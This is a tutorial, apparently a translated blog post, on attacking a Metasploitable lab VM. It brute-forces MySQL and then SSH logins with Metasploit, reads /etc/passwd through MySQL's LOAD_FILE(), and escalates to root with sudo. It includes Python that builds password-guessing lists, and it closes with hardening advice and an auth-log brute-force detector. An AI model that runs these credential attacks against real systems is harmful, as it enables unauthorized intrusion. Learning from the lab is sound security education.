Breaking into MySQL and then getting a root shell

Hi, today I'll do a small tutorial with Metasploit on breaking into a MySQL database and then using what we find there to get a root shell over SSH. The target is a Metasploitable VM (its hostname shows up in the output later on).

Let's begin...

First we scan the ports with nmap:
nmap -sV --allports --version-all 192.168.1.34
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

This is the one we care about:
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5

Open Metasploit. We'll use the mysql_login auxiliary module:
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

Set the host:
msf auxiliary(mysql_login) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34

Now set the user to log in as; in my case I'll try root:
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root

And now I'll use the PASS_FILE option to brute force :P the login, trying each password in the file (set STOP_ON_SUCCESS true if you want the module to stop at the first valid credential instead of going through the whole list):
msf auxiliary(mysql_login) > set PASS_FILE /home/linuxfer/Escritorio/pass.txt
PASS_FILE => /home/linuxfer/Escritorio/pass.txt

Run the auxiliary module:
msf auxiliary(mysql_login) > run
[*] 192.168.1.34:3306 - Found remote MySQL version 5.0.51a
[*] 192.168.1.34:3306 Trying username:'root' with password:''
[*] 192.168.1.34:3306 failed to login as 'root' with password ''
[*] 192.168.1.34:3306 Trying username:'root' with password:'murderking'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'murderking'
[*] 192.168.1.34:3306 Trying username:'root' with password:'duraznin'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'duraznin'
[*] 192.168.1.34:3306 Trying username:'root' with password:'pete'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'pete'
[*] 192.168.1.34:3306 Trying username:'root' with password:'oxono'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'oxono'
[*] 192.168.1.34:3306 Trying username:'root' with password:'puto'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'puto'
[*] 192.168.1.34:3306 Trying username:'root' with password:'root'
[+] 192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

As you can see, it logged in with root / root:
192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'

Open a new terminal and connect with the mysql client:
mysql -h 192.168.1.34 -u root -proot
-h: host
-u: user
-p: password (the password goes right after -p with no space; "mysql -u root -p root" would prompt for the password and treat "root" as the database name)

linuxfer@linuxfer-laptop:~$ mysql -h 192.168.1.34 -u root -proot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 38
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

We're inside the MySQL server. Let's check what this account can do:
mysql> show grants;
+--------------------------------------------------------------------------------------------------------------------------------+
| Grants for root@% |
+--------------------------------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' WITH GRANT OPTION |
+--------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

root@'%' means this root can log in from any host, and ALL PRIVILEGES WITH GRANT OPTION includes the FILE privilege (the hash shown is just the MySQL 4.1-style double SHA-1 of 'root'). Since secure_file_priv evidently isn't restricting reads on this server, LOAD_FILE() returns any file the OS user mysqld runs as can read. /etc/passwd is world-readable (/etc/shadow is not, so that one would just come back NULL). Let's look at the users :P
mysql> select load_file('/etc/passwd');
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
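Rather than eyeballing the dump for "the" user, here is an added example (my code, not part of the original post) that parses the /etc/passwd text LOAD_FILE() returned, keeps only accounts that can actually log in, and writes them out in the "user pass" format that ssh_login's USERPASS_FILE option expects. PASSWD_DUMP is a subset of the dump above embedded as a constructed sample; the extra password guesses in DEFAULT_PASSWORDS are my own choice.

```python
# Added example, not code from the original post: instead of eyeballing the
# /etc/passwd dump that LOAD_FILE() gave us, parse it, pick the accounts that can
# actually log in, and write them out in the "user pass" format that ssh_login's
# USERPASS_FILE option expects (one pair per line, separated by a space).
# PASSWD_DUMP is a subset of the dump shown above, embedded as a constructed sample.

PASSWD_DUMP = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
"""

# Shells that refuse an interactive login; an account with one of these is not
# worth a password guess over SSH.
NO_LOGIN_SHELLS = {"/bin/false", "/bin/true", "/bin/sync",
                   "/usr/sbin/nologin", "/sbin/nologin"}

# Extra passwords to try besides the username itself (my own short list).
# Blank is left out on purpose: ssh_login's BLANK_PASSWORDS option covers it.
DEFAULT_PASSWORDS = ["password", "123456", "changeme"]


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; skip comments and malformed lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, gid, _, home, shell = fields
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def ssh_candidates(entries):
    """Split login-capable accounts into (human, system) lists.

    human:  root, or a uid in Debian's regular-user range 1000-59999, with a
            real shell (nobody is 65534 and lands in system on purpose)
    system: daemon accounts that still have a shell; Debian usually locks these
            in /etc/shadow, which the mysql OS user cannot read, so we cannot tell
    """
    human, system = [], []
    for e in entries:
        if e["shell"] in NO_LOGIN_SHELLS:
            continue
        if e["uid"] == 0 or 1000 <= e["uid"] < 60000:
            human.append(e["name"])
        else:
            system.append(e["name"])
    return human, system


def userpass_lines(users, extra=DEFAULT_PASSWORDS):
    """Build USERPASS_FILE lines: username-as-password first, since that is exactly
    how both MySQL (root/root) and SSH (msfadmin/msfadmin) fell on this box."""
    lines = []
    for user in users:
        guesses = [user, user[::-1], user + "123", *extra]
        seen = set()
        for pw in guesses:
            if pw not in seen:       # a palindrome username would repeat itself
                seen.add(pw)
                lines.append(f"{user} {pw}")
    return lines


if __name__ == "__main__":
    human, system = ssh_candidates(parse_passwd(PASSWD_DUMP))
    print("human accounts:", human)           # ['root', 'msfadmin', 'user', 'service']
    print("system accounts with a shell:", system)
    with open("userpass.txt", "w") as fh:     # then: set USERPASS_FILE userpass.txt
        fh.write("\n".join(userpass_lines(human)) + "\n")
```

Feeding the resulting userpass.txt to ssh_login via USERPASS_FILE (instead of USERNAME plus PASS_FILE) covers root, msfadmin, user and service in one run, and puts the username-as-password guess first for each of them.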

Hmm... it looks like the user is msfadmin (uid 1000 with /bin/bash; user and service have shells too, but msfadmin is the one to try first). Back to Metasploit, this time with the scanner/ssh/ssh_login auxiliary module:
msf auxiliary(mysql_login) > use scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

Set the host:
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34

Set the user:
msf auxiliary(ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin

Set the password file we want it to brute force with:
msf auxiliary(ssh_login) > set PASS_FILE /home/linuxfer/Escritorio/pass2.txt
PASS_FILE => /home/linuxfer/Escritorio/pass2.txt

Run the auxiliary module:
msf auxiliary(ssh_login) > run

[*] 192.168.1.34:22 - SSH - Starting buteforce
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: ''
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':''
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'jaja'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'jaja'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pete'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pete'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'tutorial'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'tutorial'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'ddlr'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'ddlr'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pam'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pam'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'paquero'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'paquero'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'duraznin'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'duraznin'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
[*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
[+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And there it is, it logged in with msfadmin / msfadmin:
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
[*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
[+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '

Well, the shell session is now open. Let's list it (sessions -l) and then interact with it:
Active sessions
===============

  Id  Type   Information                              Connection
  --  ----   -----------                              ----------
  1   shell  SSH msfadmin:msfadmin (192.168.1.34:22)  192.168.1.33:58907 -> 192.168.1.34:22
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
pwd
/home/msfadmin
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Good. Now open a new terminal and connect over ssh to get a root shell (the Metasploit session is a bare command shell with no tty, and sudo needs a terminal to prompt for the password, so a normal ssh login is the easier route):
linuxfer@linuxfer-laptop:~$ ssh msfadmin@192.168.1.34
The authenticity of host '192.168.1.34 (192.168.1.34)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.34' (RSA) to the list of known hosts.
msfadmin@192.168.1.34's password:

It asks for the password; remember it's msfadmin. Type it and we're in:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Thu Jun 10 15:15:54 2010
msfadmin@metasploitable:~$

We have a shell. Now we just type sudo -i and the password msfadmin, and we have a root shell. This works because msfadmin is in the admin group (112(admin) in the id output above) and Ubuntu's default sudoers lets %admin run anything as root:
msfadmin@metasploitable:~$ sudo -i
[sudo] password for msfadmin:
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#

Game over (?)

Worth noting what made this chain so short: MySQL was reachable from the network with a root account allowed from any host ('%') and a trivial password, that account had the FILE privilege so the database turned into a file reader for the whole system, and the first real account we found used its own name as its password and sat in the sudo-capable admin group. Fixing any one of those (restrict root to localhost or bind MySQL to 127.0.0.1, set a real password, revoke FILE or set secure_file_priv, no username-as-password) breaks the chain.
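To round this off from the other side of the wire, here is an added example (my code, not part of the original post) of what the SSH brute force above looks like to whoever reads the target's auth log. OpenSSH logs every password attempt in the "Failed password for ... from ... port ... ssh2" / "Accepted password for ..." format used below; AUTH_LOG is a constructed sample that mirrors this run (nine failures from 192.168.1.33, then a success on port 58907 at 17:55:19) plus an earlier normal login. Syslog timestamps carry no year, so 2010 is assumed; the threshold and window are my own choice.

```python
# Added example, not code from the original post: the same brute force seen from
# the target's side. AUTH_LOG is a constructed sample in OpenSSH's auth-log format
# that mirrors the run above; syslog lines have no year, so 2010 is assumed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

AUTH_LOG = """\
Jun 10 15:15:54 metasploitable sshd[4101]: Accepted password for msfadmin from 192.168.1.10 port 50122 ssh2
Jun 10 17:55:10 metasploitable sshd[5412]: Failed password for msfadmin from 192.168.1.33 port 58899 ssh2
Jun 10 17:55:11 metasploitable sshd[5414]: Failed password for msfadmin from 192.168.1.33 port 58900 ssh2
Jun 10 17:55:12 metasploitable sshd[5416]: Failed password for msfadmin from 192.168.1.33 port 58901 ssh2
Jun 10 17:55:13 metasploitable sshd[5418]: Failed password for msfadmin from 192.168.1.33 port 58902 ssh2
Jun 10 17:55:14 metasploitable sshd[5420]: Failed password for msfadmin from 192.168.1.33 port 58903 ssh2
Jun 10 17:55:15 metasploitable sshd[5422]: Failed password for msfadmin from 192.168.1.33 port 58904 ssh2
Jun 10 17:55:16 metasploitable sshd[5424]: Failed password for msfadmin from 192.168.1.33 port 58905 ssh2
Jun 10 17:55:17 metasploitable sshd[5426]: Failed password for msfadmin from 192.168.1.33 port 58906 ssh2
Jun 10 17:55:18 metasploitable sshd[5428]: Failed password for invalid user admin from 192.168.1.33 port 58906 ssh2
Jun 10 17:55:19 metasploitable sshd[5430]: Accepted password for msfadmin from 192.168.1.33 port 58907 ssh2
Jun 10 17:55:19 metasploitable sshd[5430]: pam_unix(sshd:session): session opened for user msfadmin by (uid=0)
"""

# One line per password attempt. "invalid user" appears when the name does not
# exist on the box; we still count it as a failure from that source.
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+(?:\.\d+){3}) port \d+ ssh2$"
)


def parse_sshd(lines, year=2010):
    """Return (timestamp, source_ip, user, success) for each password attempt."""
    events = []
    for line in lines:
        m = SSHD_RE.match(line)
        if not m:
            continue  # pam/session noise and anything that is not a password attempt
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def find_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag a source once it reaches `threshold` failures inside `window`, and
    flag separately when such a source then logs in: that second alert is the
    one that matters, because it means the guessing worked."""
    findings = []
    recent = defaultdict(list)  # ip -> failure timestamps still inside the window
    for ts, ip, user, ok in sorted(events):
        fails = [t for t in recent[ip] if ts - t <= window]
        if ok:
            if len(fails) >= threshold:
                findings.append({"type": "bruteforce_success", "ip": ip,
                                 "user": user, "failures": len(fails), "at": ts})
            recent[ip] = []  # a login, legitimate or not, closes the episode
        else:
            fails.append(ts)
            recent[ip] = fails
            if len(fails) == threshold:  # fire once, when the line is crossed
                findings.append({"type": "bruteforce", "ip": ip,
                                 "failures": len(fails), "at": ts})
    return findings


if __name__ == "__main__":
    for f in find_bruteforce(parse_sshd(AUTH_LOG.splitlines())):
        print(f)
```

Run against the sample this yields two findings from 192.168.1.33: a "bruteforce" at 17:55:14 (fifth failure) and a "bruteforce_success" for msfadmin at 17:55:19 after nine failures, while the 15:15:54 login from 192.168.1.10 stays quiet. The MySQL half of the chain is harder to catch: MySQL 5.x writes "Access denied" lines for failed logins to its error log only when log_warnings has been raised above its default of 1, so on a stock server the root/root guessing likely leaves no trace at all.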

Well, I hope you liked it and understood it well. Sorry for not making a video, but I have a few little problems :P


Information taken from:
http://linuxfer.diosdelared.com/?coment=7363
